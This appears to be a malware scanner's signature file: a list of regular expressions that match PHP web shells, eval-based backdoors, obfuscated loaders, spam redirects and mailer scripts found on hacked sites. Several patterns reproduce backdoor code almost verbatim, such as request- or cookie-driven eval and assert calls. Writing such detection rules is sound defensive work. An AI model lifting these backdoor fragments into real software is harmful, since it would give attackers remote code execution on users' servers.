qr/<\?php.+?\$wp\_object\_cache\s+\=.+?strrev\(\'edo\'\.\'c\'\.\'ed\_4\'\.\'6e\'\.\'sab\'\)\;.+?strrev\(\'ecalp\'\.\'er\'\.\'\_ge\'\.\'rp\'\)\;.+?\\x3B\"\,\"\.\"\)\;\s+\?>/is,
qr/\#\!\/usr\/bin\/perl.+?use\s+MIME\:\:Base64.+?\}\)\{print\s+decode\_base64\(\$.+?system\(decode\_base64\(\$.+?<\/pre>\"\}\}/is,
qr/\#Coded\s+By.+?AddHandler\s+cgi\-script\s+\.alfa/is,
qr/\#\!\/usr\/bin\/perl\s+\-I\/usr\/local\/bandmin\s+use\s+MIME\:\:Base64\;use\s+Compress\:\:Zlib\;eval\(Compress\:\:Zlib\:\:memGunzip\(decode\_base64\(.+?\)\)\)\;/is,
qr/\#\!\/usr\/bin\/python\s+import\s+zlib\,\s+base64\s+eval\(compile\(zlib\.decompress\(base64\.b64decode\(.+?\)\)\,\'<string>\'\,\'exec\'\)\)/is,
qr/<center><H2>\s+<SCRIPT>.+?function\s+string2array\(text\).+?while\(farben\.length<text\.length\).+?\/\/document\.write\(text\)\;\s+<\/SCRIPT><\/H2><\/center>/is,
qr/<\!DOCTYPE.+?Stupidc0de\s+Shell.+?\+\s+copyright\s+\+.+?<\/div>\s+<\/BODY><\/html>/is,
qr/<\?php.+?\$me\s+\=\s+basename\(\_\_FILE\_\_\)\;\s+\$cookiename\s+\=.+?ours\s+\:\-\)\s+exit\(\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\)\s+or\s+die\;\/\*\'\..+?\*\/\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(false\,\$([A-z0-9]{1,20})\(\$.+?\'\;/is,
qr/<\?php\s+\$sh\_name\s+\=\s+\"x0rg\-Bypass\s+w0rms\.com\"\;.+?Restricted\s+Area.+?capriv8exit\(\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\)die\;eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20}).+?\$\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\&\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\=\(\/\*.+?\)\)eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\).+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\=\(([A-z0-9]{1,20})\.\'@\'\..+?\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\.\/\*.+?\)\;eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\;.+?\'\;/is,
qr/<\?php\s+\$OO00O0\=\d\;eval\(gzinflate\(base64\_decode\(str\_rot13\(.+?\)\)\)\)\;\?>/is,
qr/<\?php\s+\$OO00O0\=\d\;eval\s+\(gzinflate\s+\(base64\_decode\s+\(str\_rot13\s+\(.+?\)\)\)\)\;\?>/is,
qr/RewriteRule\s+\^g\(\\d\+\)\[\-\/\]\.\*.+?RewriteRule\s+\^v\(\\d\+\)\[\-\/\]\.\*.+?RewriteRule\s+\^\.\*\[\-\/\]g\(\\d\+\)\[\-\/\]v\(\\d\+\)\[\-\/\]\.\*\$\s+index\\\.php\?id\=\$1\-\$2\&\%\{QUERY\_STRING\}\s+\[L\]/is,
qr/<\?php.+?\@system\(\"killall\s+\-9\s+\"\.basename\(\"\/usr\/bin\/host\"\)\)\;.+?\@unlink\(\"1\.sh\"\)\;\s+\?>/is,
qr/<\?php.+?function\s+getDirContents\(\$dir\)\s+\{.+?if\(unlink\(\$path\.\'\/wp\-admin\/update\-core\.php\'\)\)\s+\{.+?\}\s+\}\s+\?>/is,
qr/<\?php\s+function\s+([A-z0-9]{1,10})\(\$([A-z0-9]{1,10})\,\s+\$([A-z0-9]{1,10})\)\{\$([A-z0-9]{1,10})\s+\=\s+\'\'\;\s+for\(\$([A-z]{1,2})\=0\;\s+\$([A-z]{1,2})\s+\<\s+strlen\(\$([A-z0-9]{1,10})\)\;\s+\$([A-z]{1,2})\+\+\)\{\$([A-z0-9]{1,10})\s+\.\=\s+isset\(\$([A-z0-9]{1,10})\[\$([A-z0-9]{1,10})\[\$([A-z]{1,2})\]\]\)\s+\?\s+\$([A-z0-9]{1,10})\[\$([A-z0-9]{1,10})\[\$([A-z]{1,2})\]\]\s+\:\s+\$([A-z0-9]{1,10})\[\$([A-z]{1,2})\]\;\}\s+\$([A-z0-9]{1,10})\=\"base64\_decode\"\;return\s+\$([A-z0-9]{1,10})\(\$([A-z0-9]{1,10})\)\;\}.+?\$([A-z]{1,2})\s+\=\s+\Array\(.+?eval\(([A-z0-9]{1,10})\(\$([A-z]{1,2})\,\s+\$([A-z]{1,2})\)\)\;\?>/is,
qr/<\?php\s+eval\(gzuncompress\(\".+?\"\)\)/is,
qr/<\?php\s+\$([A-z0-9]{1,10})\=\'aWYoaXNzZXQoJF9SRVFVRVNUWydjb2NvJ10pICYmICRfUkVRVUVTVFsnY29jbyddIT0nJyl7ZXZhbCgkX1JFUVVFU1RbJ2NvY28nXSk7ZXhpdCgpO30\=\'\;eval\(base64\_decode\(\$([A-z0-9]{1,10})\)\)\;exit\(\)\;\s+\?>/is,
qr/<\?php\s+chmod\(get\_root\_path\(\)\,\s+0755\)\;.+?function\s+get\_root\_path\(\).+?die\(\$reason\)\;\s+\}/is,
qr/<html>\s+<title>1962Cracker\s+\|\s+cPanel\s+Cracker\s+\&\s+Root\s+Server\.\.\.\|<\/title>.+?<\?php\s+eval\(base64\_decode\(.+?<\/Script>/is,
qr/<\?php.+?\$wp\_file\_descriptions\s+\=\s+array\(.+?\$wp\_template\s+\=\s+\@preg\_replace\(\"\/\(\[a\-z0\-9\-\%\]\+\)\.\(\[a\-z\-\@\]\+\)\.\(\[a\-z\]\+\)\/.+?\$2\(\$3\(urldecode\(\'\$1\'\)\)\)\"\,\s+\$search\.\"\.\@\"\.\$wp\_file\_descriptions\[\'rtl\.css\'\]\)\;\s+\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\_REQUEST\[\"q\"\]\)\s+AND\s+\$\_REQUEST\[\"q\"\]\=\=\"1\"\)\{echo\s+\"200\"\;\s+exit\;\}\s+if\(isset\(\$\_POST\[\"key\"\]\)\s+\&\&\s+isset\(\$\_POST\[\"chk\"\]\)\s+\&\&\s+\$\_POST\[\"key\"\]\=\=\".+?\"\)eval\(gzuncompress\(base64\_decode\(\$\_POST\[\"chk\"\]\)\)\)\;\s+\?>/is,
qr/<\?php\s+if\s+\(\!defined\(\'ALREADY\_RUN\_.+?define\(\'ALREADY\_RUN\_.+?eval\/\*i\*\/\(([A-z0-9]{1,20})\(\$([A-z0-9]{1,10})\,\s+\$([A-z0-9]{1,10})\)\)\;\s+\}/is,
qr/<\?php\s+eval\(gzuncompress\(.+?\"\)\)\;/is,
qr/<\?php.+?class\s+JApplication.+?new\s+JApplication\(array\s+\(\'UID\'\s+\=>\s+\'([A-z0-9]{1,20})\'\)\)\;/is,
qr/<\?php\s+\/\*\s+\@package\s+WordPress\s+\*\/\s+eval\(base64\_decode\(\@\$\_POST\[\"([A-z0-9]{1,20})\"\]\)\)\;\?>/is,
qr/<\?php\s+if\s+\(\!defined\(\'ALREADY\_RUN\_.+?\)\)\;\s+\}/is,
qr/<\?php\s+\$dom\s+\=\s+array\(.+?\$url\s+\=\s+\'http\:\/\/\'\.\$dom\[mt\_rand\(0\,sizeof\(\$dom\)\-1\)\]\.\'\/file\.php\'\;.+?header\(\'Location\:\s+\'\.\$url\)\;\s+\}\s+exit\;\s+\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\_GET\[\"id\"\]\)\)\s+header\(.+?\.\$\_GET\[\"id\"\]\)\;\s+\?>/is,
qr/<\?php\s+eval\(base64\_decode\(.+?\)\)\;/is,
qr/<\?php\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$\_SERVER\;\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\).+?functions+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\{return\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\}\;.+?\}\(\$url\,\s+FALSE\,\s+\$\{([A-z0-9]{1,20})\(.+?return\s+\$\{.+?\)\}\;\s+\}/is,
qr/<\?php\s+eval\(base64\_decode\(.+?include.+?x70hp\"\;.+?include.+?x70hp\"\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=chr\(([0-9]{1,4})\).+?chr\(([0-9]{1,4})\).+?chr\(([0-9]{1,4})\).+?chr\(([0-9]{1,4})\).+?chr\(([0-9]{1,4})\).+?\)\;\s+\?>/is,
qr/\*\/\s+eval\(base64\_decode\(\"aWY.+?\=\"\)\)\;\s+\/\*/is,
qr/\*\/include\s+\/\*/is,
qr/\*\/\".+?\.co.+?php\"\;\/\*/is,
qr/<\?\s+\$([A-z0-9]{1,3})\[1\]\=\"([A-z0-9]{1,20})\.html\"\;\$([A-z0-9]{1,3})\[1\]\=.+?file\_put\_contents\(\$fileaddr\,gzuncompress\(base64\_decode\(\$([A-z0-9]{1,3})\[\$([A-z0-9]{1,3})\]\)\)\)\;\}\s+unlink\(\$scr\.\"\.php\"\)\;\s+\?>/is,
qr/<\?php\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$\_SERVER\;\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\).+?exit\(\$\{([A-z0-9]{1,20})\(\"lie\=\=\?\"\)\}\)\;\s+\}/is,
qr/eval\(base64\_decode\(\"aWY.+?include.+?eval\(base64\_decode\(\"aWY.+?include.+?ephp\"\;/is,
qr/<\?php\s+\/\*\s+ionCube24\s+encoder\s+\*\/\s+global.+?eval\(base64\_decode\(.+?\_\_halt\_compiler\(\)\;([A-z0-9]{250,})/is,
qr/<\?\s+eval\(gzuncompress\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\$([A-z0-9]{1,20})\s+\=\s+\'pr\'\.\'eg\'\.\'\_r\'\.\'epl\'\.\'ace\'\;.+?\@\$([A-z0-9]{1,20})\(\'\#\#e\'\,.+?\'\'\)\;/is,
qr/<\?php\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$\_SERVER\;\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\).+?\Z/is,
qr/<script\s+type\=\"application\/javascript\">var\s+toggleMenu\s+\=\s+function\(\).+?getCookie\(\"ytm\_hit1\"\)\&\&\(setCookie\(\"ytm\_hit1\"\,1\,1\)\,1\=\=getCookie\(\"ytm\_hit1\"\).+?\/script>\'\)\)\)\;<\/script>/is,
qr/<\?php\s+if\(isset\(\$\_POST\[chr\(100\).+?<h1>Object\s+not\s+found\!<\/h1>.+?<h2>Error\s+404<\/h2>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=chr\(97\)\.chr\(117\)\.\"t\"\.chr\(104\)\.\"\_\"\.\"p\"\.\".+?\"\.\"s\"\.chr\(115\)\;.+?\)\)\;\s+\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#/is,
qr/<\?\s+\$GLOBALS\[\'\_([0-9]{1,20})\_\'\]\=Array\(base64\_decode\(.+?return.+?round\(.+?\)\;\}/is,
qr/<IfModule\s+mod\_rewrite\.c>\s+RewriteEngine\s+On\s+RewriteCond\s+\%\{HTTP\_REFERER\}\s+\^\.\*\(google\|ask\|yahoo.+?\/index\_backup\.php\?query\=\$1\s+\[QSA\,L\]\s+<\/IfModule>/is,
qr/<\?php\s+if\s+\(isset\(\$\_GET\[\'jpg\'\]\)\)\s+\{\s+header\(\s+\'Content\-Type\:\s+image\/jpeg\'\s+\)\;\s+readfile\(\'http\:\/\/.+?\.jpg\'\)\;\s+\exit\(\)\;\s+\}\s+header\(\'Location\:\s+http\:\/\/.+?\'\)\;\s+exit\(\)\;/is,
qr/function\s+l\_\_1\(\$.+?function\s+l\_\_3\(\$\_2\)\{if\(\$GLOBALS\[\Z/is,
qr/<\?php\s+if\s+\(isset\(\$\_GET\[\'jpg\'\]\)\).+?\)\;\s+exit\(\)\;/is,
qr/<\?php\s+define\(\'URL\_HEADER\_NAME\'\,\s+\"X\-Upstream\-Url\"\)\;\s+define\(\'DEBUG\_HEADER\_NAME\'\,\s+\"X\-Debug\-Oleg\"\)\;.+?else\s+if\(strcasecmp\(\$h\,\s+\$key\)\s+\=\=\s+0\)\s+unset\(\$headers\[\$h\]\)\;\s+\}\s+\}/is,
qr/<\?php\s+\$GLOBALS\[\'\_([0-9]{1,20})\_\'\]\=Array\(base64\_decode\(.+?return\s+base64\_decode\(\$a\[\$i\]\)\;\}.+?\$GLOBALS\[\'\_([0-9]{1,20})\_\'\]\[.+?\s+exit\(\)\;\Z/is,
qr/<\?php\s+\$ua\s+\=\s+\$\_SERVER\[\'HTTP\_USER\_AGENT\'\]\;\s+if\s+\(preg\_match\(\'\/facebook\/si\'\,\$ua\)\)\s+\{.+?<\/noframes>\s+<\/html>\'\;\s+\}\s+\?>/is,
qr/<\?php\s+session\_start\(\)\;.+?\.php\_uname\(\)\..+?<\/form>/is,
qr/\'\;if\(\s+\$\_POST\[\'\_upl\'\].+?<\/form>/is,
qr/<\?php\s+if\(\!empty\(\$\_FILES\[\'message\'\]\[\'name\'\]\).+?<\/body>\s+<\/html>\'\;\/\/([0-9]{1,20})/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\"\_\"\.\'G\'\.\'E\'\.\'T\'\;\s+if\s+\(isset\(.+?preg\_replace\(.+?header\(\'Location\:\s+http\:\/\/.+?exit\(\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?if\s+\(\(strstr\(\$([A-z0-9]{1,20})\,\".+?\"\)\)\s+or\s+\(strstr\(([A-z0-9]{1,20})\}\[.+?\)rtolower\(\$\_SERVER\[.+?\)\s+\&\&\s+\(\!isset\(\$GLOBALS\[.+?if\(\(function\_exists\(.+?\)\)\s+or\s+\(strstr\(\$.+?\(0\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+implode\(array\_.+?\)\{return\s+chr\(ord\(\$n\)\-1\)\;\}\s+\@error\_reportin.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+=.+?\$uas\=strtolower\(.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,10})\*\/\s+\@include\s+\".+?\/\*([A-z0-9]{1,10})\*\/\s+echo\s+file\_get\_contents\(\'.+?\'\)\;/is,
qr/function\s+l\_\_1\(\$\_\Z/is,
qr/<\?php\s+if\(\!empty\(\$\_FILES\[\'message\'\]\[\'name\'\]\)\s+\&\&\s+\(md5\(\$\_POST\[\'name\'\]\).+?Message\s+sent\!<\/body>\s+<\/html>\'\;/is,
qr/<\?php\s+\$report\_url\s+\=\s+\$\_POST\[\'url\'\]\;\s+\$pass\s+\=\s+\$\_POST\[\'pass\'\]\;\s+\$list\s+\=\s=\$\_POST\[\'list\'\]\;.+?if\s+\(\@stripos\(\$hello\,\'\+OK\'\)\!\=\=false\)\s+\{\s+return\s+true\;\s+\}\s+return\s+false\;\s+\}/is,
qr/<\?php\s+\/\*\s+<\!\-\-\s+WordPress\s+SEO\s+Plugin\s+\-\->\s+\*\/\s+eval\(gzuncompress\(base64_decode\(.+?\)\)\)\;\s+\/\*\s+<\!\-\-\s+End\s+WordPress\s+SEO\s+Plugin\s+\-\->\s+\*\/\s+\?>/is,
qr/\/\*([A-z0-9]{1,10})\*\/\s+\@include\s+\".+?\"\;\s+\/\*([A-z0-9]{1,10})\*\//is,
qr/<\?PHP\s+if\(isset\(\$\_REQUEST\[\"cmd\"\]\)\)\{eval\(stripslashes\(\$\_REQUEST\[\"cmd\"\]\)\)\;die\(\)\;\}\s+\?>/is,
qr/<\?php\s+\$auth_pass.+?\$color.+?\$default\_action\s+\=\s+\'FilesMan\'\;\s+\$default\_use\_ajax\s+\=\s+true\;\s+\$default\_charset\s+\=\s+\'Windows\-1251\'\;\s+if\(\!empty\(\$\_SERVER\[\'HTTP\_USER\_AGENT\'\]\)\)\s+\{\s+\$userAgents\s+\=\s+array\(\"Google\"\,\s+\"Slurp\"\,\s+\"MSNBot\"\,\s+\"ia\_archiver\"\,\s+\"Yandex\"\,\s+\"Rambler\"\)\;\s+if\(preg\_match\(\'\/\'\s+\.\s+implode\(\'\|\'\,\s+\$userAgents\)\s+\.\s+\'\/i\'\,\s+\$\_SERVER\[\'HTTP\_USER\_AGENT\'\]\)\)\s+\{\s+header\(\'HTTP\/1\.0\s+404\s+Not\s+Found\'\)\;\s+exit\;/is,
qr/<\?php.+?\$auth_pass.+?\$color.+?\$default_action\s+\=\s+\'FilesMan\'\;.+?\)\;\?>/is,
qr/<\?php\s+\$\{.+?\,NULL\)\;\@ini\_set\(\"log\_.+?\;return\s+sh\_decrypt\_phase\(sh\_decrypt\_phase\(\$\{\$\{.+?\=>\@phpversion\(\)\,.+?\]\)\;\}exit\(\)\;\}/is,
qr/<\?php\s+\$\{.+?\)\{if\(is\_uploaded\_file\(.+?\)\;\s+\?>/is,
qr/<\?php\s+eval\(.+?x3B\"\)\;\s+\?>/is,
qr/<\?php\s+\/\*\*\s+WordPress.+?eval\(gz.+?\$x([A-z0-9]{1,10})\s+\,\"([0-9]{1,5})\"\)\;/is,
qr/<\?php\s+\$noc\s+=\s+\".+?\$noc\[([0-9]{1,3})\]\.\$noc\[([0-9]{1,3})\]\.\$noc\[([0-9]{1,3})\]\.\$noc\[([0-9]{1,3})\].+?\$noc\[([0-9]{1,3})\]\.\$([A-z0-9]{1,10})\;\@\$([A-z0-9]{1,10})\(\$([A-z0-9]{1,10})\)\;\?>/is,
qr/<\?php\s+\/\/function\s+M404\s+\(\)\{.+?\$strings\s+\=\s+explode\(\'\|\'\,\s+base64\_decode\(base64\_decode\(base64\_decode\(base64\_decode\(base64\_decode\(base64\_decode\(base64\_decode\(base64\_decode\(\$value\)\)\)\)\)\)\)\)\)\;.+?echo\s+\'\#\#\#\#\#\'\.\s+\$result\s+\.\s+\'\*\*\*\*\*\'\;\s+exit\;/is,
qr/<\?php\s+\$action\=\$\_REQUEST\[\'action\'\]\;\s+\/\/status.+?echo\s+\"File\s+does\s+not\s+exist\"\;\s+\}\s+\?>/is,
qr/<\?php\s+\$p\s+\=\s+\$\_REQUEST\[\"m\"\]\;\s+eval\(base64\_decode\(\$p\)\)\;\s+\?>/is,
qr/\/\*edition\:1\.6\*\/.+?\;eval\(gzuncompress\(base64\_decode\(\$([A-z0-9]{1,20})\)\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\=call\_user\_func\(.+?\)\;\s+\$([A-z0-9]{1,20})\=call\_user\_func\(.+?\)\;\s+eval\(\$([A-z0-9]{1,20})\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\".+?\"\;\$([A-z0-9]{1,20})\=call\_user\_func\(\$.+?\)\;\$([A-z0-9]{1,20})\=call\_user\_func\(\$.+?\)\;eval\(\$([A-z0-9]{1,20})\)\;/is,
qr/var\s+\_0xaae8\=\[\"\"\,\".+?\"\]\;document\[\_0xaae8\[5\]\]\(\_0xaae8\[4\]\[\_0xaae8\[3\]\]\(\_0xaae8\[0\]\)\[\_0xaae8\[2\]\]\(\)\[\_0xaae8\[1\]\]\(\_0xaae8\[0\]\)\)/is,
qr/<\?php\s+eval\(gzuncompress\(base64\_decode\(.+?\=\=\'\)\)\)\;/is,
qr/<\?php\s+\$report\_url\s+\=\s+\$\_POST\[\'url\'\]\;\s+\$pass\s+\=\s+\$\_POST\[\'pass\'\]\;\s+\$list\s+\=\s+\$\_POST\[\'list\'\]\;.+?if\s+\(\@stripos\(\$hello\,\'\+OK\'\)\!\=\=false\)\s+\{\s+return\s+true\;\s+\}\s+return\s+false\;\s+\}/is,
qr/A<\?php\s+\$license\s+\=\s+str\_rot13\(\'n\'\.\'f\'\.\'f\'\.\'r\'\.\'e\'\.\'g\'\)\;\s+\$license\(\$\_POST\[\'info\'\]\)\;\s+\?>/is,
qr/<\?php\s+preg\_replace\(\"\/\.\/.+?\)\)\)\;\"\,\"\.\"\)\;/is,
qr/<\?php\s+\$file.+?function\s+dwnld\(\$file\)\s+\{.+?header\(\"HTTP\/1\.0\s+404\s+Not\s+Found\"\)\;\s+exit\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?explode\(chr\(\(.+?\$([A-z0-9]{1,20})\=\(([0-9]{1,4})\-([0-9]{1,4})\)\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+\@ini\_set\(\'display\_errors.+?bad\_agents\s+\=\s+\'\~google.+?register\_shutdown\_function\(\'ob\_end\_flush\'\)\;\s+\}\s+\}\s+\?>/is,
qr/<html>\s+<head>\s+<title>Hacked\s+by\s+ZeDaN\-Mrx.+?<\/iframe>\s+<\/html>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'xftest\'\]\)\)die\(pi\(\)\*6\).+?eval.+?exit\(\)\;\}\s+\?>/is,
qr/<\?php\s+\@ini\_set\(\'display\_errors\'\,\s+\'0\'\)\;\s+error\_reporting\(0\)\;\s+\$skipme\s+\=\s+false\;\s+\$bad\_agents\s+\=\s+\'\~google.+?<\/script>\"\;\s+\}\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQ\"\.\"UEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$q\=\"asser\"\.\"t\"\;\$q\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\!DOCTYPE\s+html\s+PUBLIC.+?rainbow\.arch\.scriptmania\.com.+?height\=\"1\"\s+width\=\"1\"><\/embed>\s+\<\/html>/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$P\=\/\*([A-z0-9]{1,20})\*\/\"ass\"\.\"ert\"\;\$\W\=\$P\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_COOKIE\[\".+?\"\]\)\)\{\$\_COOKIE\[\".+?\"\]\(\$\_COOKIE\[\".+?\"\]\)\;exit\;\}/is,
qr/include\_once\s+\"3732787075626C69635F68746D6C\.htm\"\;/is,
qr/bgeteam\s+<\?php\s+error\_reporting\(0\)\;\s+if\(isset\(\$\_GET\[bge\]\)\).+?else\{echo\"<b>\"\;\}\}\}\s+\?>/is,
qr/<\?php\s+\$k=\"ass\"\.\"ert\"\;\s+\$k\(\$\{\"\_PO\"\.\"ST\"\}\s+\[\'wei\'\]\)\;\?>/is,
qr/<\?php\s+function\s+result\(\$data\)\s+\{\s+\$result\=implode\(.+?\$result\=preg\_replace\(.+?if\(isset\(\$\_COOKIE\[\'google\'\]\)\).+?echo\(result\(array\(.+?\?>/is,
qr/<\?php.+?\$e19\s+\=.+?include\_once\(\$H26\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+mail\(stripslashes\(\$([A-z0-9]{1,20})\)\,\s+stripslashes\(\$([A-z0-9]{1,20})\)\,\s+stripslashes\(\$([A-z0-9]{1,20})\)\,\s+stripslashes\(\$([A-z0-9]{1,20})\)\)\;\s+if\(\$([A-z0-9]{1,20})\)\{echo\s+\'([A-z0-9]{1,20})\'\;\}\s+else\s+\{echo\s+\'([A-z0-9]{1,20})\s+\:\s+\'\s+\.\s+\$([A-z0-9]{1,20})\;\}/is,
qr/<\?php\s+eval\(eval\(\".+?\;\}\s+else\s+\{.+?\}\"\)\)\;\s+\?>/is,
qr/<\?php\s+\/\*\*\s+\*\s+\@package.+?if\s+\(empty\s+\(\$\_POST\)\)\s+\{\s+echo\s+\'Empty\s+data\.\'.+?array\_map\s+\(.+?\$\_POST\[\'([A-z0-9]{1,5})\'\]\)\s+\)\)\;/is,
qr/<\?php\s+\@require\(\'wp\-admin\/([0-9]{1,20})\'\)\;/is,
qr/<\?php\s+echo\s+\'([0-9]{1,20})\.txt\'\;\s+\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\}/is,
qr/<html>\s+<head>\s+<meta\s+http\-equiv\=\"refresh\"\s+content\=\"1\;url\=http\:\/\/([A-z0-9]{1,20})\.([A-z0-9]{1,20})\/\">\s+<\/head>\s+<body>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\s+\@require\(\'wp-admin\/([0-9]{1,20})\'\)\;/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\$\_([A-z0-9]{1,20})\s+\=.+?\;\s+for\s+\(\$i\s+\=\s+0\;\s+\$i\s+<\s+strlen\(\$\_([A-z0-9]{1,20})\)\;\s+\$i\+\+\)\s+\$\_([A-z0-9]{1,20})\s+\.\=\s+sprintf\(.+?\$\'\_([A-z0-9]{1,20})\(\)\;\s+\/\*([A-z0-9]{1,100})\*\//is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"http\:\/\/([A-z0-9]{1,20})\.([A-z0-9]{1,20})\/.+?\.php\"\;\s+\$([A-z0-9]{1,20})\=1\;\s+header\(\"content\-type\:text\/html\;charset\=utf\-8\"\)\;\@date\_default\_timezone\_set\(\"America\/Grenada\"\).+?break\;case\s+1\:\$([A-z0-9]{1,20})\=.+?return\s+\$([A-z0-9]{1,20})\;\}/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\$\_([A-z0-9]{1,20})\s+\=.+?\/\*([A-z0-9]{1,100})\*\//is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=([0-9]{1,20})\;\s+\$([A-z0-9]{1,20})\=([0-9]{1,20})\;\s+\$([A-z0-9]{1,20})\=\'http\:\/\/.+?else\{global\$([A-z0-9]{1,20})\;return\s+strlen\(.+?return\s+\$([A-z0-9]{1,20})\;\}/is,
qr/<\?php\s+\@require\(\'\.\/([0-9]{1,20})\'\)\;/is,
qr/<\?php\s+\@\'\$\s+([A-z0-9]{1,20})\=([0-9]{1,20})\s+([A-z0-9]{1,20})\=([0-9]{1,20}).+?\=http\:\/\/([A-z0-9]{1,20}).([A-z0-9]{1,50})\/([A-z0-9]{1,20})\.php\s+cache\=([0-9]{1,10}).+?\=explode\(.+?([A-z0-9]{1,20})\!\=\'\'\)\{echo\s+\$GLOBALS\[\"([A-z0-9]{1,20})\"\]\(\$([A-z0-9]{1,20})\)\;\}\}([A-z0-9]{1,20})\(\)\;/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)die\(pi\(\)\*6\)\;\$\{.+?;eval\(\$\{\$([A-z0-9]{1,20})\}\[\".+?\"\]\)\;\}exit\(\)\;\}\?>/is,
qr/<\?php\s+\@\'\$.+?\=http\:\/\/([A-z0-9]{1,20}).([A-z0-9]{1,50})\/([A-z0-9]{1,20})\.php\s+cache\=([0-9]{1,10}).+?exit\(\)\;\}else\{return\;\}\}([A-z0-9]{1,20})\(\)\;/is,
